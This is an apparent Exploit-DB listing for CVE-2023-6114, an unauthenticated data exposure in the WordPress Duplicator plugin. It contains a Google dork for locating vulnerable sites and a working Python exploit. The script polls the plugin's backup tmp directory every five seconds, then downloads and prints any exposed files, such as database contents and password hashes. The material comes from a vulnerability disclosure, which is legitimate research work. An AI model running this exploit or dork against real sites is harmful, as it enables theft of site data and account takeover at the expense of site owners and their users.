ce58678266
7 changes to exploits/shellcodes/ghdb Sitecore - Remote Code Execution v8.2 Hitachi NAS (HNAS) System Management Unit (SMU) Backup & Restore < 14.8.7825.01 - IDOR Adobe ColdFusion versions 2018_15 (and earlier) and 2021_5 and earlier - Arbitrary File Read WordPress Plugin Duplicator < 1.5.7.1 - Unauthenticated Sensitive Data Exposure to Account Takeover Microsoft Windows Defender / Trojan.Win32/Powessere.G - Detection Mitigation Bypass
99 lines
No EOL
3.2 KiB
Python
Executable file
99 lines
No EOL
3.2 KiB
Python
Executable file
# Exploit Title: WordPress Plugin Duplicator < 1.5.7.1 -
|
|
Unauthenticated Sensitive Data Exposure to Account Takeover
|
|
# Google Dork: inurl:("plugins/duplicator/")
|
|
# Date: 2023-12-04
|
|
# Exploit Author: Dmitrii Ignatyev
|
|
# Vendor Homepage:
|
|
https://duplicator.com/?utm_source=duplicator_free&utm_medium=wp_org&utm_content=desc_details&utm_campaign=duplicator_free
|
|
# Software Link: https://wordpress.org/plugins/duplicator/
|
|
# Version: 1.5.7.1
|
|
# Tested on: Wordpress 6.4
|
|
# CVE : CVE-2023-6114# CVE-Link :
|
|
https://wpscan.com/vulnerability/5c5d41b9-1463-4a9b-862f-e9ee600ef8e1/
|
|
|
|
# CVE-Link : https://research.cleantalk.org/cve-2023-6114-duplicator-poc-exploit/A
|
|
severe vulnerability has been discovered in the directory
|
|
*/wordpress/wp-content/backups-dup-lite/tmp/*. This flaw not only
|
|
exposes extensive information about the site, including its
|
|
configuration, directories, and files, but more critically, it
|
|
provides unauthorized access to sensitive data within the database and
|
|
all data inside. Exploiting this vulnerability poses an imminent
|
|
threat, leading to potential *brute force attacks on password hashes
|
|
and, subsequently, the compromise of the entire system*.*
|
|
POC*:
|
|
|
|
1) It is necessary that either the administrator or auto-backup works
|
|
automatically at the scheduled time
|
|
|
|
2) Exploit will send file search requests every 5 seconds
|
|
|
|
3) I attack the site with this vulnerability using an exploit
|
|
|
|
Exploit sends a request to the server every 5 seconds along the path
|
|
“*http://your_site/wordpress/wp-content/backups-dup-lite/tmp/
|
|
<http://your_site/wordpress/wp-content/backups-dup-lite/tmp/>”* and if
|
|
it finds something in the index of, it instantly parses all the data
|
|
and displays it on the screen
|
|
|
|
Exploit (python3):
|
|
|
|
import requests
|
|
from bs4 import BeautifulSoup
|
|
import re
|
|
import time
|
|
|
|
url = "http://127.0.0.1/wordpress/wp-content/backups-dup-lite/tmp/"
|
|
processed_files = set()
|
|
|
|
def get_file_names(url):
|
|
response = requests.get(url)
|
|
|
|
if response.status_code == 200 and len(response.text) > 0:
|
|
soup = BeautifulSoup(response.text, 'html.parser')
|
|
links = soup.find_all('a')
|
|
|
|
file_names = []
|
|
for link in links:
|
|
file_name = link.get('href')
|
|
if file_name != "../" and not file_name.startswith("?"):
|
|
file_names.append(file_name)
|
|
|
|
return file_names
|
|
return []
|
|
|
|
def get_file_content(url, file_name):
|
|
file_url = url + file_name
|
|
|
|
|
|
if re.search(r'\.zip(?:\.|$)', file_name, re.IGNORECASE):
|
|
print(f"Ignoring file: {file_name}")
|
|
return None
|
|
|
|
file_response = requests.get(file_url)
|
|
|
|
if file_response.status_code == 200:
|
|
return file_response.text
|
|
return None
|
|
|
|
while True:
|
|
file_names = get_file_names(url)
|
|
|
|
if file_names:
|
|
print("File names on the page:")
|
|
for file_name in file_names:
|
|
if file_name not in processed_files:
|
|
print(file_name)
|
|
file_content = get_file_content(url, file_name)
|
|
|
|
if file_content is not None:
|
|
print("File content:")
|
|
print(file_content)
|
|
processed_files.add(file_name)
|
|
|
|
time.sleep(5)
|
|
|
|
|
|
|
|
--
|
|
With best regards,
|
|
Dmitrii Ignatyev, Penetration Tester |